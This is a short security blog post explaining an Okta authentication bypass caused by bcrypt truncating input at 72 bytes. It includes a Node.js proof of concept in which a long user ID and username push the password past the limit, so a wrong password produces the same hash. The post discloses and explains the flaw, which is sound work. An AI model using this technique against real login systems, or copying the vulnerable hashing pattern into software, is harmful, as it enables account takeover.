Okta vulnerability explained (bcrypt auth bypass)

Cenk Kalpakoğlu05 Nov 2024
...

220.        /* cap key_len at the actual maximum supported
221.        * length here to avoid integer wraparound */
222.        if (key_len > 72)
223.            key_len = 72;

...
const bcrypt = require('bcrypt');

const saltRounds = 10; 

// This is how bcrypt has been used:
// bcrypt(userid + username + password()

// we don't know how the userId's are generated, so use UUIDv4
var userid = "b91fa9b4-69f1-4779-8d45-73f8653057f3"; 

// very long username
var username = "my.very.long.username.with.more.characters@kondukto.io" // 54 bytes long

// valid random password 
var password = "randomStrongPassword"
var validInput = userid + username + password;

// simulate bypass input -- can be anything
var password2 = "AAAAAAAAAAAAAAAAAAA"
var bypassInput = userid + username + password2;

bcrypt.genSalt(saltRounds, function(err, salt) {
    bcrypt.hash(validInput, salt, function(err, hash) {
        console.log(hash);
    });

    bcrypt.hash(bypassInput, salt, function(err, hash) {
        console.log(hash);
    });
});
└> node main.js
$2b$10$nI463MI5Jy9iCq1G6pAFxeiPQJm7jdIINwvs./c7ENYMI7ruPGUKe
$2b$10$nI463MI5Jy9iCq1G6pAFxeiPQJm7jdIINwvs./c7ENYMI7ruPGUKe

Get A Demo